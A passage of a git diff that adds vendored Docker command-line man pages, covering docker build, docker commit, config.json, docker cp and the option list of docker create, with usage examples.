+ + For example, consider a system with more than three cores. If you start one + container **{C0}** with **--cpu-shares=512** running one process, and another container + **{C1}** with **--cpu-shares=1024** running two processes, this can result in the following + division of CPU shares: + + PID container CPU CPU share + 100 {C0} 0 100% of CPU0 + 101 {C1} 1 100% of CPU1 + 102 {C1} 2 100% of CPU2 + +**--cpu-period**=*0* + Limit the CPU CFS (Completely Fair Scheduler) period. + + Limit the container's CPU usage. This flag causes the kernel to restrict the + container's CPU usage to the period you specify. + +**--cpu-quota**=*0* + Limit the CPU CFS (Completely Fair Scheduler) quota. + + By default, containers run with the full CPU resource. This flag causes the +kernel to restrict the container's CPU usage to the quota you specify. + +**--cpuset-cpus**=*CPUSET-CPUS* + CPUs in which to allow execution (0-3, 0,1). + +**--cpuset-mems**=*CPUSET-MEMS* + Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on + NUMA systems. + + For example, if you have four memory nodes on your system (0-3), use `--cpuset-mems=0,1` +to ensure the processes in your Docker container only use memory from the first +two memory nodes. + +**--cgroup-parent**=*CGROUP-PARENT* + Path to `cgroups` under which the container's `cgroup` are created. + + If the path is not absolute, the path is considered relative to the `cgroups` path of the init process. +Cgroups are created if they do not already exist. + +**--ulimit**=[] + Ulimit options + + For more information about `ulimit` see [Setting ulimits in a +container](https://docs.docker.com/engine/reference/commandline/run/#set-ulimits-in-container---ulimit) + +# EXAMPLES + +## Building an image using a Dockerfile located inside the current directory + +Docker images can be built using the build command and a Dockerfile: + + docker build . + +During the build process Docker creates intermediate images. 
In order to +keep them, you must explicitly set `--rm=false`. + + docker build --rm=false . + +A good practice is to make a sub-directory with a related name and create +the Dockerfile in that directory. For example, a directory called mongo may +contain a Dockerfile to create a Docker MongoDB image. Likewise, another +directory called httpd may be used to store Dockerfiles for Apache web +server images. + +It is also a good practice to add the files required for the image to the +sub-directory. These files will then be specified with the `COPY` or `ADD` +instructions in the `Dockerfile`. + +Note: If you include a tar file (a good practice), then Docker will +automatically extract the contents of the tar file specified within the `ADD` +instruction into the specified target. + +## Building an image and naming that image + +A good practice is to give a name to the image you are building. Note that +only a-z0-9-_. should be used for consistency. There are no hard rules here but it is best to give the names consideration. + +The **-t**/**--tag** flag is used to rename an image. Here are some examples: + +Though it is not a good practice, image names can be arbitrary: + + docker build -t myimage . + +A better approach is to provide a fully qualified and meaningful repository, +name, and tag (where the tag in this context means the qualifier after +the ":"). In this example we build a JBoss image for the Fedora repository +and give it the version 1.0: + + docker build -t fedora/jboss:1.0 . + +The next example is for the "whenry" user repository and uses Fedora and +JBoss and gives it the version 2.1 : + + docker build -t whenry/fedora-jboss:v2.1 . + +If you do not provide a version tag then Docker will assign `latest`: + + docker build -t whenry/fedora-jboss . + +When you list the images, the image above will have the tag `latest`. + +You can apply multiple tags to an image. 
For example, you can apply the `latest` +tag to a newly built image and add another tag that references a specific +version. +For example, to tag an image both as `whenry/fedora-jboss:latest` and +`whenry/fedora-jboss:v2.1`, use the following: + + docker build -t whenry/fedora-jboss:latest -t whenry/fedora-jboss:v2.1 . + +So renaming an image is arbitrary but consideration should be given to +a useful convention that makes sense for consumers and should also take +into account Docker community conventions. + + +## Building an image using a URL + +This will clone the specified GitHub repository from the URL and use it +as context. The Dockerfile at the root of the repository is used as +Dockerfile. This only works if the GitHub repository is a dedicated +repository. + + docker build github.com/scollier/purpletest + +Note: You can set an arbitrary Git repository via the `git://` scheme. + +## Building an image using a URL to a tarball'ed context + +This will send the URL itself to the Docker daemon. The daemon will fetch the +tarball archive, decompress it and use its contents as the build context. The +Dockerfile at the root of the archive and the rest of the archive will get used +as the context of the build. If you pass an **-f PATH/Dockerfile** option as well, +the system will look for that file inside the contents of the tarball. + + docker build -f dev/Dockerfile https://10.10.10.1/docker/context.tar.gz + +Note: supported compression formats are 'xz', 'bzip2', 'gzip' and 'identity' (no compression). + +## Specify isolation technology for container (--isolation) + +This option is useful in situations where you are running Docker containers on +Windows. The `--isolation=` option sets a container's isolation +technology. On Linux, the only supported is the `default` option which uses +Linux namespaces. On Microsoft Windows, you can specify these values: + +* `default`: Use the value specified by the Docker daemon's `--exec-opt` . 
If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value. +* `process`: Namespace isolation only. +* `hyperv`: Hyper-V hypervisor partition-based isolation. + +Specifying the `--isolation` flag without a value is the same as setting `--isolation="default"`. + +# HISTORY +March 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +June 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-commit.1.md b/vendor/github.com/docker/docker/man/docker-commit.1.md new file mode 100644 index 0000000000..d8a4cf8387 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-commit.1.md @@ -0,0 +1,71 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-commit - Create a new image from a container's changes + +# SYNOPSIS +**docker commit** +[**-a**|**--author**[=*AUTHOR*]] +[**-c**|**--change**[=\[*DOCKERFILE INSTRUCTIONS*\]]] +[**--help**] +[**-m**|**--message**[=*MESSAGE*]] +[**-p**|**--pause**[=*true*]] +CONTAINER [REPOSITORY[:TAG]] + +# DESCRIPTION +Create a new image from an existing container specified by name or +container ID. The new image will contain the contents of the +container filesystem, *excluding* any data volumes. Refer to **docker-tag(1)** +for more information about valid image and tag names. + +While the `docker commit` command is a convenient way of extending an +existing image, you should prefer the use of a Dockerfile and `docker +build` for generating images that you intend to share with other +people. 
+ +# OPTIONS +**-a**, **--author**="" + Author (e.g., "John Hannibal Smith ") + +**-c** , **--change**=[] + Apply specified Dockerfile instructions while committing the image + Supported Dockerfile instructions: `CMD`|`ENTRYPOINT`|`ENV`|`EXPOSE`|`LABEL`|`ONBUILD`|`USER`|`VOLUME`|`WORKDIR` + +**--help** + Print usage statement + +**-m**, **--message**="" + Commit message + +**-p**, **--pause**=*true*|*false* + Pause container during commit. The default is *true*. + +# EXAMPLES + +## Creating a new image from an existing container +An existing Fedora based container has had Apache installed while running +in interactive mode with the bash shell. Apache is also running. To +create a new image run `docker ps` to find the container's ID and then run: + + # docker commit -m="Added Apache to Fedora base image" \ + -a="A D Ministrator" 98bd7fc99854 fedora/fedora_httpd:20 + +Note that only a-z0-9-_. are allowed when naming images from an +existing container. + +## Apply specified Dockerfile instructions while committing the image +If an existing container was created without the DEBUG environment +variable set to "true", you can create a new image based on that +container by first getting the container's ID with `docker ps` and +then running: + + # docker commit -c="ENV DEBUG true" 98bd7fc99854 debug-image + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and in +June 2014, updated by Sven Dowideit +July 2014, updated by Sven Dowideit +Oct 2014, updated by Daniel, Dao Quang Minh +June 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-config-json.5.md b/vendor/github.com/docker/docker/man/docker-config-json.5.md new file mode 100644 index 0000000000..49987f08b8 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-config-json.5.md @@ -0,0 +1,72 @@ +% CONFIG.JSON(5) Docker User Manuals +% Docker Community +% JANUARY 2016 +# NAME +HOME/.docker/config.json 
- Default Docker configuration file + +# INTRODUCTION + +By default, the Docker command line stores its configuration files in a +directory called `.docker` within your `$HOME` directory. Docker manages most of +the files in the configuration directory and you should not modify them. +However, you *can modify* the `config.json` file to control certain aspects of +how the `docker` command behaves. + +Currently, you can modify the `docker` command behavior using environment +variables or command-line options. You can also use options within +`config.json` to modify some of the same behavior. When using these +mechanisms, you must keep in mind the order of precedence among them. Command +line options override environment variables and environment variables override +properties you specify in a `config.json` file. + +The `config.json` file stores a JSON encoding of several properties: + +* The `HttpHeaders` property specifies a set of headers to include in all messages +sent from the Docker client to the daemon. Docker does not try to interpret or +understand these headers; it simply puts them into the messages. Docker does not +allow these headers to change any headers it sets for itself. + +* The `psFormat` property specifies the default format for `docker ps` output. +When the `--format` flag is not provided with the `docker ps` command, +Docker's client uses this property. If this property is not set, the client +falls back to the default table format. For a list of supported formatting +directives, see **docker-ps(1)**. + +* The `detachKeys` property specifies the default key sequence which +detaches the container. When the `--detach-keys` flag is not provided +with the `docker attach`, `docker exec`, `docker run` or `docker +start`, Docker's client uses this property. If this property is not +set, the client falls back to the default sequence `ctrl-p,ctrl-q`. + + +* The `imagesFormat` property specifies the default format for `docker images` +output. 
When the `--format` flag is not provided with the `docker images` +command, Docker's client uses this property. If this property is not set, the +client falls back to the default table format. For a list of supported +formatting directives, see **docker-images(1)**. + +You can specify a different location for the configuration files via the +`DOCKER_CONFIG` environment variable or the `--config` command line option. If +both are specified, then the `--config` option overrides the `DOCKER_CONFIG` +environment variable: + + docker --config ~/testconfigs/ ps + +This command instructs Docker to use the configuration files in the +`~/testconfigs/` directory when running the `ps` command. + +## Examples + +Following is a sample `config.json` file: + + { + "HttpHeaders": { + "MyHeader": "MyValue" + }, + "psFormat": "table {{.ID}}\\t{{.Image}}\\t{{.Command}}\\t{{.Labels}}", + "imagesFormat": "table {{.ID}}\\t{{.Repository}}\\t{{.Tag}}\\t{{.CreatedAt}}", + "detachKeys": "ctrl-e,e" + } + +# HISTORY +January 2016, created by Moxiegirl diff --git a/vendor/github.com/docker/docker/man/docker-cp.1.md b/vendor/github.com/docker/docker/man/docker-cp.1.md new file mode 100644 index 0000000000..949d60bb8b --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-cp.1.md @@ -0,0 +1,175 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-cp - Copy files/folders between a container and the local filesystem. + +# SYNOPSIS +**docker cp** +[**--help**] +CONTAINER:SRC_PATH DEST_PATH|- + +**docker cp** +[**--help**] +SRC_PATH|- CONTAINER:DEST_PATH + +# DESCRIPTION + +The `docker cp` utility copies the contents of `SRC_PATH` to the `DEST_PATH`. +You can copy from the container's file system to the local machine or the +reverse, from the local filesystem to the container. If `-` is specified for +either the `SRC_PATH` or `DEST_PATH`, you can also stream a tar archive from +`STDIN` or to `STDOUT`. The `CONTAINER` can be a running or stopped container. 
+The `SRC_PATH` or `DEST_PATH` can be a file or directory. + +The `docker cp` command assumes container paths are relative to the container's +`/` (root) directory. This means supplying the initial forward slash is optional; +The command sees `compassionate_darwin:/tmp/foo/myfile.txt` and +`compassionate_darwin:tmp/foo/myfile.txt` as identical. Local machine paths can +be an absolute or relative value. The command interprets a local machine's +relative paths as relative to the current working directory where `docker cp` is +run. + +The `cp` command behaves like the Unix `cp -a` command in that directories are +copied recursively with permissions preserved if possible. Ownership is set to +the user and primary group at the destination. For example, files copied to a +container are created with `UID:GID` of the root user. Files copied to the local +machine are created with the `UID:GID` of the user which invoked the `docker cp` +command. If you specify the `-L` option, `docker cp` follows any symbolic link +in the `SRC_PATH`. `docker cp` does *not* create parent directories for +`DEST_PATH` if they do not exist. + +Assuming a path separator of `/`, a first argument of `SRC_PATH` and second +argument of `DEST_PATH`, the behavior is as follows: + +- `SRC_PATH` specifies a file + - `DEST_PATH` does not exist + - the file is saved to a file created at `DEST_PATH` + - `DEST_PATH` does not exist and ends with `/` + - Error condition: the destination directory must exist. 
+ - `DEST_PATH` exists and is a file + - the destination is overwritten with the source file's contents + - `DEST_PATH` exists and is a directory + - the file is copied into this directory using the basename from + `SRC_PATH` +- `SRC_PATH` specifies a directory + - `DEST_PATH` does not exist + - `DEST_PATH` is created as a directory and the *contents* of the source + directory are copied into this directory + - `DEST_PATH` exists and is a file + - Error condition: cannot copy a directory to a file + - `DEST_PATH` exists and is a directory + - `SRC_PATH` does not end with `/.` + - the source directory is copied into this directory + - `SRC_PATH` does end with `/.` + - the *content* of the source directory is copied into this + directory + +The command requires `SRC_PATH` and `DEST_PATH` to exist according to the above +rules. If `SRC_PATH` is local and is a symbolic link, the symbolic link, not +the target, is copied by default. To copy the link target and not the link, +specify the `-L` option. + +A colon (`:`) is used as a delimiter between `CONTAINER` and its path. You can +also use `:` when specifying paths to a `SRC_PATH` or `DEST_PATH` on a local +machine, for example `file:name.txt`. If you use a `:` in a local machine path, +you must be explicit with a relative or absolute path, for example: + + `/path/to/file:name.txt` or `./file:name.txt` + +It is not possible to copy certain system files such as resources under +`/proc`, `/sys`, `/dev`, tmpfs, and mounts created by the user in the container. +However, you can still copy such files by manually running `tar` in `docker exec`. +For example (consider `SRC_PATH` and `DEST_PATH` are directories): + + $ docker exec foo tar Ccf $(dirname SRC_PATH) - $(basename SRC_PATH) | tar Cxf DEST_PATH - + +or + + $ tar Ccf $(dirname SRC_PATH) - $(basename SRC_PATH) | docker exec -i foo tar Cxf DEST_PATH - + + +Using `-` as the `SRC_PATH` streams the contents of `STDIN` as a tar archive. 
+The command extracts the content of the tar to the `DEST_PATH` in container's +filesystem. In this case, `DEST_PATH` must specify a directory. Using `-` as +the `DEST_PATH` streams the contents of the resource as a tar archive to `STDOUT`. + +# OPTIONS +**-L**, **--follow-link**=*true*|*false* + Follow symbol link in SRC_PATH + +**--help** + Print usage statement + +# EXAMPLES + +Suppose a container has finished producing some output as a file it saves +to somewhere in its filesystem. This could be the output of a build job or +some other computation. You can copy these outputs from the container to a +location on your local host. + +If you want to copy the `/tmp/foo` directory from a container to the +existing `/tmp` directory on your host. If you run `docker cp` in your `~` +(home) directory on the local host: + + $ docker cp compassionate_darwin:tmp/foo /tmp + +Docker creates a `/tmp/foo` directory on your host. Alternatively, you can omit +the leading slash in the command. If you execute this command from your home +directory: + + $ docker cp compassionate_darwin:tmp/foo tmp + +If `~/tmp` does not exist, Docker will create it and copy the contents of +`/tmp/foo` from the container into this new directory. If `~/tmp` already +exists as a directory, then Docker will copy the contents of `/tmp/foo` from +the container into a directory at `~/tmp/foo`. + +When copying a single file to an existing `LOCALPATH`, the `docker cp` command +will either overwrite the contents of `LOCALPATH` if it is a file or place it +into `LOCALPATH` if it is a directory, overwriting an existing file of the same +name if one exists. For example, this command: + + $ docker cp sharp_ptolemy:/tmp/foo/myfile.txt /test + +If `/test` does not exist on the local machine, it will be created as a file +with the contents of `/tmp/foo/myfile.txt` from the container. If `/test` +exists as a file, it will be overwritten. 
Lastly, if `/test` exists as a +directory, the file will be copied to `/test/myfile.txt`. + +Next, suppose you want to copy a file or folder into a container. For example, +this could be a configuration file or some other input to a long running +computation that you would like to place into a created container before it +starts. This is useful because it does not require the configuration file or +other input to exist in the container image. + +If you have a file, `config.yml`, in the current directory on your local host +and wish to copy it to an existing directory at `/etc/my-app.d` in a container, +this command can be used: + + $ docker cp config.yml myappcontainer:/etc/my-app.d + +If you have several files in a local directory `/config` which you need to copy +to a directory `/etc/my-app.d` in a container: + + $ docker cp /config/. myappcontainer:/etc/my-app.d + +The above command will copy the contents of the local `/config` directory into +the directory `/etc/my-app.d` in the container. + +Finally, if you want to copy a symbolic link into a container, you typically +want to copy the linked target and not the link itself. To copy the target, use +the `-L` option, for example: + + $ ln -s /tmp/somefile /tmp/somefile.ln + $ docker cp -L /tmp/somefile.ln myappcontainer:/tmp/ + +This command copies content of the local `/tmp/somefile` into the file +`/tmp/somefile.ln` in the container. Without `-L` option, the `/tmp/somefile.ln` +preserves its symbolic link but not its content. + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. 
+June 2014, updated by Sven Dowideit +May 2015, updated by Josh Hawn diff --git a/vendor/github.com/docker/docker/man/docker-create.1.md b/vendor/github.com/docker/docker/man/docker-create.1.md new file mode 100644 index 0000000000..3f8a076374 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-create.1.md @@ -0,0 +1,553 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-create - Create a new container + +# SYNOPSIS +**docker create** +[**-a**|**--attach**[=*[]*]] +[**--add-host**[=*[]*]] +[**--blkio-weight**[=*[BLKIO-WEIGHT]*]] +[**--blkio-weight-device**[=*[]*]] +[**--cpu-shares**[=*0*]] +[**--cap-add**[=*[]*]] +[**--cap-drop**[=*[]*]] +[**--cgroup-parent**[=*CGROUP-PATH*]] +[**--cidfile**[=*CIDFILE*]] +[**--cpu-count**[=*0*]] +[**--cpu-percent**[=*0*]] +[**--cpu-period**[=*0*]] +[**--cpu-quota**[=*0*]] +[**--cpu-rt-period**[=*0*]] +[**--cpu-rt-runtime**[=*0*]] +[**--cpus**[=*0.0*]] +[**--cpuset-cpus**[=*CPUSET-CPUS*]] +[**--cpuset-mems**[=*CPUSET-MEMS*]] +[**--device**[=*[]*]] +[**--device-read-bps**[=*[]*]] +[**--device-read-iops**[=*[]*]] +[**--device-write-bps**[=*[]*]] +[**--device-write-iops**[=*[]*]] +[**--dns**[=*[]*]] +[**--dns-search**[=*[]*]] +[**--dns-option**[=*[]*]] +[**-e**|**--env**[=*[]*]] +[**--entrypoint**[=*ENTRYPOINT*]] +[**--env-file**[=*[]*]] +[**--expose**[=*[]*]] +[**--group-add**[=*[]*]] +[**-h**|**--hostname**[=*HOSTNAME*]] +[**--help**] +[**-i**|**--interactive**] +[**--ip**[=*IPv4-ADDRESS*]] +[**--ip6**[=*IPv6-ADDRESS*]] +[**--ipc**[=*IPC*]] +[**--isolation**[=*default*]] +[**--kernel-memory**[=*KERNEL-MEMORY*]] +[**-l**|**--label**[=*[]*]] +[**--label-file**[=*[]*]] +[**--link**[=*[]*]] +[**--link-local-ip**[=*[]*]] +[**--log-driver**[=*[]*]] +[**--log-opt**[=*[]*]] +[**-m**|**--memory**[=*MEMORY*]] +[**--mac-address**[=*MAC-ADDRESS*]] +[**--memory-reservation**[=*MEMORY-RESERVATION*]] +[**--memory-swap**[=*LIMIT*]] +[**--memory-swappiness**[=*MEMORY-SWAPPINESS*]] +[**--name**[=*NAME*]] 
+[**--network-alias**[=*[]*]] +[**--network**[=*"bridge"*]] +[**--oom-kill-disable**] +[**--oom-score-adj**[=*0*]] +[**-P**|**--publish-all**] +[**-p**|**--publish**[=*[]*]] +[**--pid**[=*[PID]*]] +[**--userns**[=*[]*]] +[**--pids-limit**[=*PIDS_LIMIT*]] +[**--privileged**] +[**--read-only**] +[**--restart**[=*RESTART*]] +[**--rm**] +[**--security-opt**[=*[]*]] +[**--storage-opt**[=*[]*]] +[**--stop-signal**[=*SIGNAL*]] +[**--stop-timeout**[=*TIMEOUT*]] +[**--shm-size**[=*[]*]] +[**--sysctl**[=*[]*]] +[**-t**|**--tty**] +[**--tmpfs**[=*[CONTAINER-DIR[:]*]] +[**-u**|**--user**[=*USER*]] +[**--ulimit**[=*[]*]] +[**--uts**[=*[]*]] +[**-v**|**--volume**[=*[[HOST-DIR:]CONTAINER-DIR[:OPTIONS]]*]] +[**--volume-driver**[=*DRIVER*]] +[**--volumes-from**[=*[]*]] +[**-w**|**--workdir**[=*WORKDIR*]] +IMAGE [COMMAND] [ARG...] + +# DESCRIPTION + +Creates a writeable container layer over the specified image and prepares it for +running the specified command. The container ID is then printed to STDOUT. This +is similar to **docker run -d** except the container is never started. You can +then use the **docker start ** command to start the container at +any point. + +The initial status of the container created with **docker create** is 'created'. + +# OPTIONS +**-a**, **--attach**=[] + Attach to STDIN, STDOUT or STDERR. + +**--add-host**=[] + Add a custom host-to-IP mapping (host:ip) + +**--blkio-weight**=*0* + Block IO weight (relative weight) accepts a weight value between 10 and 1000. + +**--blkio-weight-device**=[] + Block IO weight (relative device weight, format: `DEVICE_NAME:WEIGHT`). + +**--cpu-shares**=*0* + CPU shares (relative weight) + +**--cap-add**=[] + Add Linux capabilities + +**--cap-drop**=[] + Drop Linux capabilities + +**--cgroup-parent**="" + Path to cgroups under which the cgroup for the container will be created. If the path is not absolute, the path is considered to be relative to the cgroups path of the init process. 
Cgroups will be created if they do not already exist. + +**--cidfile**="" + Write the container ID to the file + +**--cpu-count**=*0* + Limit the number of CPUs available for execution by the container. + + On Windows Server containers, this is approximated as a percentage of total CPU usage. + + On Windows Server containers, the processor resource controls are mutually exclusive, the order of precedence is CPUCount first, then CPUShares, and CPUPercent last. + +**--cpu-percent**=*0* + Limit the percentage of CPU available for execution by a container running on a Windows daemon. + + On Windows Server containers, the processor resource controls are mutually exclusive, the order of precedence is CPUCount first, then CPUShares, and CPUPercent last. + +**--cpu-period**=*0* + Limit the CPU CFS (Completely Fair Scheduler) period + + Limit the container's CPU usage. This flag tells the kernel to restrict the container's CPU usage to the period you specify. + +**--cpuset-cpus**="" + CPUs in which to allow execution (0-3, 0,1) + +**--cpuset-mems**="" + Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems. + + If you have four memory nodes on your system (0-3), use `--cpuset-mems=0,1` +then processes in your Docker container will only use memory from the first +two memory nodes. + +**--cpu-quota**=*0* + Limit the CPU CFS (Completely Fair Scheduler) quota + +**--cpu-rt-period**=0 + Limit the CPU real-time period in microseconds + + Limit the container's Real Time CPU usage. This flag tells the kernel to restrict the container's Real Time CPU usage to the period you specify. + +**--cpu-rt-runtime**=0 + Limit the CPU real-time runtime in microseconds + + Limit the container's Real Time CPU usage. This flag tells the kernel to limit the amount of time in a given CPU period Real Time tasks may consume. 
Ex: + Period of 1,000,000us and Runtime of 950,000us means that this container could consume 95% of available CPU and leave the remaining 5% to normal priority tasks. + + The sum of all runtimes across containers cannot exceed the amount allotted to the parent cgroup. + +**--cpus**=0.0 + Number of CPUs. The default is *0.0*. + +**--device**=[] + Add a host device to the container (e.g. --device=/dev/sdc:/dev/xvdc:rwm) + +**--device-read-bps**=[] + Limit read rate (bytes per second) from a device (e.g. --device-read-bps=/dev/sda:1mb) + +**--device-read-iops**=[] + Limit read rate (IO per second) from a device (e.g. --device-read-iops=/dev/sda:1000) + +**--device-write-bps**=[] + Limit write rate (bytes per second) to a device (e.g. --device-write-bps=/dev/sda:1mb) + +**--device-write-iops**=[] + Limit write rate (IO per second) to a device (e.g. --device-write-iops=/dev/sda:1000) + +**--dns**=[] + Set custom DNS servers + +**--dns-option**=[] + Set custom DNS options + +**--dns-search**=[] + Set custom DNS search domains (Use --dns-search=. if you don't wish to set the search domain) + +**-e**, **--env**=[] + Set environment variables + +**--entrypoint**="" + Overwrite the default ENTRYPOINT of the image + +**--env-file**=[] + Read in a line-delimited file of environment variables + +**--expose**=[] + Expose a port or a range of ports (e.g. --expose=3300-3310) from the container without publishing it to your host + +**--group-add**=[] + Add additional groups to run as + +**-h**, **--hostname**="" + Container host name + +**--help** + Print usage statement + +**-i**, **--interactive**=*true*|*false* + Keep STDIN open even if not attached. The default is *false*. + +**--ip**="" + Sets the container's interface IPv4 address (e.g. 172.23.0.9) + + It can only be used in conjunction with **--network** for user-defined networks + +**--ip6**="" + Sets the container's interface IPv6 address (e.g. 
2001:db8::1b99) + + It can only be used in conjunction with **--network** for user-defined networks + +**--ipc**="" + Default is to create a private IPC namespace (POSIX SysV IPC) for the container + 'container:': reuses another container shared memory, semaphores and message queues + 'host': use the host shared memory,semaphores and message queues inside the container. Note: the host mode gives the container full access to local shared memory and is therefore considered insecure. + +**--isolation**="*default*" + Isolation specifies the type of isolation technology used by containers. Note +that the default on Windows server is `process`, and the default on Windows client +is `hyperv`. Linux only supports `default`. + +**--kernel-memory**="" + Kernel memory limit (format: `[]`, where unit = b, k, m or g) + + Constrains the kernel memory available to a container. If a limit of 0 +is specified (not using `--kernel-memory`), the container's kernel memory +is not limited. If you specify a limit, it may be rounded up to a multiple +of the operating system's page size and the value can be very large, +millions of trillions. + +**-l**, **--label**=[] + Adds metadata to a container (e.g., --label=com.example.key=value) + +**--label-file**=[] + Read labels from a file. Delimit each label with an EOL. + +**--link**=[] + Add link to another container in the form of :alias or just + in which case the alias will match the name. + +**--link-local-ip**=[] + Add one or more link-local IPv4/IPv6 addresses to the container's interface + +**--log-driver**="*json-file*|*syslog*|*journald*|*gelf*|*fluentd*|*awslogs*|*splunk*|*etwlogs*|*gcplogs*|*none*" + Logging driver for the container. Default is defined by daemon `--log-driver` flag. + **Warning**: the `docker logs` command works only for the `json-file` and + `journald` logging drivers. + +**--log-opt**=[] + Logging driver specific options. 
+ +**-m**, **--memory**="" + Memory limit (format: [], where unit = b, k, m or g) + + Allows you to constrain the memory available to a container. If the host +supports swap memory, then the **-m** memory setting can be larger than physical +RAM. If a limit of 0 is specified (not using **-m**), the container's memory is +not limited. The actual limit may be rounded up to a multiple of the operating +system's page size (the value would be very large, that's millions of trillions). + +**--mac-address**="" + Container MAC address (e.g. 92:d0:c6:0a:29:33) + +**--memory-reservation**="" + Memory soft limit (format: [], where unit = b, k, m or g) + + After setting memory reservation, when the system detects memory contention +or low memory, containers are forced to restrict their consumption to their +reservation. So you should always set the value below **--memory**, otherwise the +hard limit will take precedence. By default, memory reservation will be the same +as memory limit. + +**--memory-swap**="LIMIT" + A limit value equal to memory plus swap. Must be used with the **-m** +(**--memory**) flag. The swap `LIMIT` should always be larger than **-m** +(**--memory**) value. + + The format of `LIMIT` is `[]`. Unit can be `b` (bytes), +`k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you don't specify a +unit, `b` is used. Set LIMIT to `-1` to enable unlimited swap. + +**--memory-swappiness**="" + Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100. + +**--name**="" + Assign a name to the container + +**--network**="*bridge*" + Set the Network mode for the container + 'bridge': create a network stack on the default Docker bridge + 'none': no networking + 'container:': reuse another container's network stack + 'host': use the Docker host network stack. Note: the host mode gives the container full access to local system services such as D-bus and is therefore considered insecure. 
+ '|': connect to a user-defined network + +**--network-alias**=[] + Add network-scoped alias for the container + +**--oom-kill-disable**=*true*|*false* + Whether to disable OOM Killer for the container or not. + +**--oom-score-adj**="" + Tune the host's OOM preferences for containers (accepts -1000 to 1000) + +**-P**, **--publish-all**=*true*|*false* + Publish all exposed ports to random ports on the host interfaces. The default is *false*. + +**-p**, **--publish**=[] + Publish a container's port, or a range of ports, to the host + format: ip:hostPort:containerPort | ip::containerPort | hostPort:containerPort | containerPort + Both hostPort and containerPort can be specified as a range of ports. + When specifying ranges for both, the number of container ports in the range must match the number of host ports in the range. (e.g., `-p 1234-1236:1234-1236/tcp`) + (use 'docker port' to see the actual mapping) + +**--pid**="" + Set the PID mode for the container + Default is to create a private PID namespace for the container + 'container:': join another container's PID namespace + 'host': use the host's PID namespace for the container. Note: the host mode gives the container full access to local PID and is therefore considered insecure. + +**--userns**="" + Set the user namespace mode for the container when `userns-remap` option is enabled. + **host**: use the host user namespace and enable all privileged options (e.g., `pid=host` or `--privileged`). + +**--pids-limit**="" + Tune the container's pids limit. Set `-1` to have unlimited pids for the container. + +**--privileged**=*true*|*false* + Give extended privileges to this container. The default is *false*. + +**--read-only**=*true*|*false* + Mount the container's root filesystem as read only. + +**--restart**="*no*" + Restart policy to apply when a container exits (no, on-failure[:max-retry], always, unless-stopped). + +**--rm**=*true*|*false* + Automatically remove the container when it exits. 
The default is *false*. + +**--shm-size**="" + Size of `/dev/shm`. The format is ``. `number` must be greater than `0`. + Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you omit the unit, the system uses bytes. + If you omit the size entirely, the system uses `64m`. + +**--security-opt**=[] + Security Options + + "label:user:USER" : Set the label user for the container + "label:role:ROLE" : Set the label role for the container + "label:type:TYPE" : Set the label type for the container + "label:level:LEVEL" : Set the label level for the container + "label:disable" : Turn off label confinement for the container + "no-new-privileges" : Disable container processes from gaining additional privileges + "seccomp:unconfined" : Turn off seccomp confinement for the container + "seccomp:profile.json : White listed syscalls seccomp Json file to be used as a seccomp filter + +**--storage-opt**=[] + Storage driver options per container + + $ docker create -it --storage-opt size=120G fedora /bin/bash + + This (size) will allow to set the container rootfs size to 120G at creation time. + This option is only available for the `devicemapper`, `btrfs`, `overlay2` and `zfs` graph drivers. + For the `devicemapper`, `btrfs` and `zfs` storage drivers, user cannot pass a size less than the Default BaseFS Size. + For the `overlay2` storage driver, the size option is only available if the backing fs is `xfs` and mounted with the `pquota` mount option. + Under these conditions, user can pass any size less then the backing fs size. + +**--stop-signal**=*SIGTERM* + Signal to stop a container. Default is SIGTERM. + +**--stop-timeout**=*10* + Timeout (in seconds) to stop a container. Default is 10. 
+ +**--sysctl**=SYSCTL + Configure namespaced kernel parameters at runtime + + IPC Namespace - current sysctls allowed: + + kernel.msgmax, kernel.msgmnb, kernel.msgmni, kernel.sem, kernel.shmall, kernel.shmmax, kernel.shmmni, kernel.shm_rmid_forced + Sysctls beginning with fs.mqueue.* + + Note: if you use --ipc=host using these sysctls will not be allowed. + + Network Namespace - current sysctls allowed: + Sysctls beginning with net.* + + Note: if you use --network=host using these sysctls will not be allowed. + +**-t**, **--tty**=*true*|*false* + Allocate a pseudo-TTY. The default is *false*. + +**--tmpfs**=[] Create a tmpfs mount + + Mount a temporary filesystem (`tmpfs`) mount into a container, for example: + + $ docker run -d --tmpfs /tmp:rw,size=787448k,mode=1777 my_image + + This command mounts a `tmpfs` at `/tmp` within the container. The supported mount +options are the same as the Linux default `mount` flags. If you do not specify +any options, the systems uses the following options: +`rw,noexec,nosuid,nodev,size=65536k`. + +**-u**, **--user**="" + Sets the username or UID used and optionally the groupname or GID for the specified command. + + The followings examples are all valid: + --user [user | user:group | uid | uid:gid | user:gid | uid:group ] + + Without this argument root user will be used in the container by default. + +**--ulimit**=[] + Ulimit options + +**--uts**=*host* + Set the UTS mode for the container + **host**: use the host's UTS namespace inside the container. + Note: the host mode gives the container access to changing the host's hostname and is therefore considered insecure. + +**-v**|**--volume**[=*[[HOST-DIR:]CONTAINER-DIR[:OPTIONS]]*] + Create a bind mount. If you specify, ` -v /HOST-DIR:/CONTAINER-DIR`, Docker + bind mounts `/HOST-DIR` in the host to `/CONTAINER-DIR` in the Docker + container. If 'HOST-DIR' is omitted, Docker automatically creates the new + volume on the host. 
